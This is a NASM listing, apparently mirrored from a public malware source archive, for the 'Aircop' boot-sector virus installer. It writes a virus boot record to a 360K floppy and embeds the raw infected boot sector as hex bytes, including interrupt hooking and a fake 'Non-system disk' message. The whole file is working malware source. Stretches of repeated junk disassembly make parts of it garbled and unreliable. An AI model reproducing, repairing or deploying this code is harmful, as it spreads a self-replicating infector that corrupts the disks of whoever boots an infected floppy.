mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 10:56:10 +00:00
468 lines
12 KiB
NASM
468 lines
12 KiB
NASM
ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸
|
||
³ Aircop Virus (c)RABiD Source Code ³
|
||
³ Ripped by : The Head Hunter [F‹S] ³
|
||
³ ³
|
||
³ Seem's this baby only work on Bare 360k Drive ³
|
||
³ System. Neat Anywayz. And it's Undetectable! ³
|
||
³ ³
|
||
³ ³
|
||
ÔÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ;
|
||
MOV AX, CS
|
||
MOV DS, AX
|
||
MOV SP, 03b6h
|
||
MOV AH, 00h
|
||
MOV AL, 03h
|
||
INT 10h ;Set video mode
|
||
MOV DX, 052bh
|
||
MOV AH, 09h
|
||
INT 21h ;"AIRCOP Test Version"
|
||
MOV DX, 03c3h
|
||
MOV AH, 09h
|
||
INT 21h ;"
|
||
|
||
|
||
MOV DX, 04e5h
|
||
MOV AH, 09h
|
||
INT 21h ;"Aircop Virus$Cannot"
|
||
MOV DX, 0464h
|
||
MOV AH, 09h
|
||
INT 21h ;"" into your 360K di"
|
||
MOV DX, 0480h
|
||
MOV AH, 09h
|
||
INT 21h ;"Put a 360K (Blank F"
|
||
MOV AX, 0040h
|
||
MOV ES, AX
|
||
|
||
PUSH WORD PTR ES:[Data5]
|
||
|
||
POP WORD PTR ES:[Data6]
|
||
MOV AX, CS
|
||
MOV ES, AX
|
||
MOV AH, 08h
|
||
INT 21h ;Get char w/o echo
|
||
MOV CX, 0003h
|
||
PUSH CX
|
||
MOV AX, 0201h
|
||
MOV BX, 05d0h
|
||
MOV CX, 0001h
|
||
MOV DX, 0000h
|
||
INT 13h ;Read disk sectors
|
||
POP CX
|
||
JNB Jmp0
|
||
LOOP Data7
|
||
MOV DX, 04f2h
|
||
MOV AH, 09h
|
||
INT 21h ;"Cannot read boot re"
|
||
MOV AX, 4cffh
|
||
INT 21h ;Exit
|
||
|
||
XOR WORD PTR CS:[BP+Data17], 7420h
|
||
PUSH CX
|
||
MOV AX, 0301h
|
||
MOV BX, 05d0h
|
||
MOV CX, 2709h
|
||
MOV DX, 0100h
|
||
INT 13h ;Write disk sectors
|
||
POP CX
|
||
JNB Jmp4
|
||
LOOP Data18
|
||
MOV DX, 050eh
|
||
MOV AH, 09h
|
||
INT 21h ;"Cannot write boot r"
|
||
MOV AX, 4cffh
|
||
INT 21h ;Exit
|
||
|
||
MOV CX, 0003h
|
||
PUSH CX
|
||
MOV AX, 0301h
|
||
MOV BX, 07d0h
|
||
MOV CX, 0001h
|
||
MOV DX, 0000h
|
||
INT 13h ;Write disk sectors
|
||
POP CX
|
||
JNB Jmp5
|
||
LOOP Data20
|
||
MOV DX, 057ch
|
||
MOV AH, 09h
|
||
INT 21h ;"Cannot write virus "
|
||
MOV AX, 4cffh
|
||
INT 21h ;Exit
|
||
|
||
MOV DX, 04e5h
|
||
MOV AH, 09h
|
||
INT 21h ;"Aircop Virus$Cannot"
|
||
MOV DX, 059eh
|
||
MOV AH, 09h
|
||
INT 21h ;" was installed into"
|
||
MOV AX, 4c00h
|
||
INT 21h ;Exit
|
||
db 'STACK STACK STAC'
|
||
db 'K STACK STACK '
|
||
db 'STACK STACK STAC'
|
||
db 'K STACK STACK '
|
||
db 'STACK STACK STAC'
|
||
db 'K STACK STACK '
|
||
db 'STACK STACK '
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [BP+DI+Data9], DL
|
||
INC CX
|
||
INC BX
|
||
DEC BX
|
||
AND BYTE PTR [BX+SI], AH
|
||
AND BYTE PTR [DI], CL
|
||
|
||
OR AL, BYTE PTR [BX+DI+Data11]
|
||
JZ Jmp1
|
||
OUTSB
|
||
JZ Jmp2
|
||
OUTSW
|
||
OUTSB
|
||
CMP AH, BYTE PTR [BX+SI]
|
||
PUSH SP
|
||
PUSH BYTE PTR [BX+DI+Data12], 7620h
|
||
db 'irus sample uses onl'
|
||
db 'y in research teams.'
|
||
db 0d,0a
|
||
db ' Please do'
|
||
db ' not use in joking o'
|
||
db 'r setting tra'
|
||
|
||
XOR WORD PTR CS:[BX+SI], 6e69h
|
||
|
||
XOR WORD PTR CS:[BP+SI+Data13], 2073h
|
||
OUTSW
|
||
OUTSB
|
||
AND BYTE PTR [BP+DI+Data14], DH
|
||
INSW
|
||
db 'eone.'
|
||
db 0d,0a,0d,0a
|
||
db 'Warning! This file i'
|
||
|
||
XOR WORD PTR CS:[BX+Data15], 2e65h
|
||
db 'nstalls "$" into you'
|
||
|
||
db 'r 360K disk!'
|
||
db 0d,0a,0d,0a,07
|
||
db '$Put a 360K (Blank F'
|
||
|
||
db 'ormatted) disk into '
|
||
db 'drive A:'
|
||
db 0d,0a
|
||
db 'Strike any key to in'
|
||
db 'stall, or CTRL-BREAK'
|
||
db ' to quit.'
|
||
db 0d,0a
|
||
db '$Aircop Virus$Cannot'
|
||
|
||
|
||
db ' read boot record.'
|
||
db 0d,0a,07
|
||
db '$Cannot write boot r'
|
||
|
||
db 'ecord.'
|
||
db 0d,0a,07
|
||
db '$AIRCOP Test Version'
|
||
|
||
db ': Property of The RA'
|
||
db 'BID Nat'nl Developme'
|
||
db 'nt Corp. '91'
|
||
db 0d,0a,20,24,0d,0a,0d,0a,0d,0a
|
||
|
||
db 'Cannot write virus b'
|
||
db 'oot record'
|
||
db 0d,0a,07
|
||
db '$ was installed into'
|
||
|
||
db ' this 360K disk. BE '
|
||
db 'CAREFUL!'
|
||
db 0d,0a,24,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
|
||
db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
|
||
db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
|
||
db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
|
||
db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
|
||
db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
|
||
db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
|
||
db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
|
||
db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
|
||
db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
|
||
db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
|
||
db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
|
||
db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
|
||
db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
|
||
db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
|
||
db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
|
||
db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
|
||
db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
|
||
db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
|
||
db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
|
||
db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
|
||
db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
|
||
db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
|
||
db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
|
||
db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
|
||
db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,eb,34,90,49,42
|
||
db 'M 3.3'
|
||
db 00,02,02,01,00,02,70,00,d0,02,fd,02,00,09,00,02,00,00,00,00
|
||
db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,12,00,00,00
|
||
db 00,01,00,fa,33,c0,8e,d8,8e,d0,bb,00,7c,8b,e3,1e,53,ff,0e,13
|
||
db 04,cd,12,b1,06,d3,e0,8e,c0,87,06,4e,00,a3,ab,7d,b8,28,01,87
|
||
db 06,4c,00,a3,a9,7d,8c,c0,87,06,66,00,a3,af,7d,b8,bb,00,87,06
|
||
db 64,00,a3,ad,7d,33,ff,8b,f3,b9,00,01,fc,f3,a5,fb,06,b8,85,00
|
||
db 50,cb,53,32,d2,e8,70,00,5b,1e,07,b4,02,b6,01,e8,8a,00,72,10
|
||
db 0e,1f,be,0b,00,bf,0b,7c,b9,2b,00,fc,f3,a6,74,07,5b,58,0e,b8
|
||
db af,00,50,cb,0e,1f,be,db,01,e8,23,00,32,e4,cd,16,33,c0,cd,13
|
||
db 0e,07,bb,0d,02,b9,06,00,33,d2,b8,01,02,cd,13,72,df,b9,f0,0f
|
||
db 8e,d9,2e,ff,2e,ad,01,bb,07,00,fc,ac,0a,c0,74,44,79,05,34,d7
|
||
db 80,cb,88,3c,20,76,07,b9,01,00,b4,09,cd,10,b4,0e,cd,10,eb,df
|
||
db bb,00,02,b9,02,00,8a,e1,e8,17,00,b9,09,27,26,80,37,fd,74,03
|
||
db b9,0f,4f,eb,13,90,b4,02,bb,00,02,b9,01,00,b6,00,b0,01,9c,2e
|
||
db ff,1e,a9,01,c3,50,53,51,52,06,1e,56,57,9c,0e,1f,80,fa,01,77
|
||
db 54,25,00,fe,74,4f,86,c5,d0,e0,02,c6,b4,09,f6,e4,03,c1,2c,06
|
||
db 3d,06,00,77,3c,0e,07,e8,c0,ff,72,30,bf,43,00,be,50,02,b9,0e
|
||
db 00,fd,f3,a6,74,27,2b,f1,2b,f9,b1,33,f3,a4,e8,8b,ff,51,53,e8
|
||
db a0,ff,b4,03,33,db,e8,9e,ff,5b,59,72,07,b6,01,b4,03,e8,98,ff
|
||
db 33,c0,e8,95,ff,b4,04,cd,1a,80,fe,09,75,06,be,b1,01,e8,3f,ff
|
||
db 9d,5f,5e,1f,07
|
||
db 'ZY[X.'
|
||
db ff,2e,a9,01,59,ec,02,c6,f2,e6,00,f0,da,dd,20,83,bf,be,a4,f7
|
||
db be,a4,f7,96,be,a5,b4,b8,a7,da,dd,00
|
||
db 'IO SYSMSDOS S'
|
||
db 59,53,0d,0a
|
||
db 'Non-system disk or d'
|
||
db 'isk error'
|
||
db 0d,0a,00,00,55,aa
|
||
|
||
|
||
|
||
|
||
|
||
|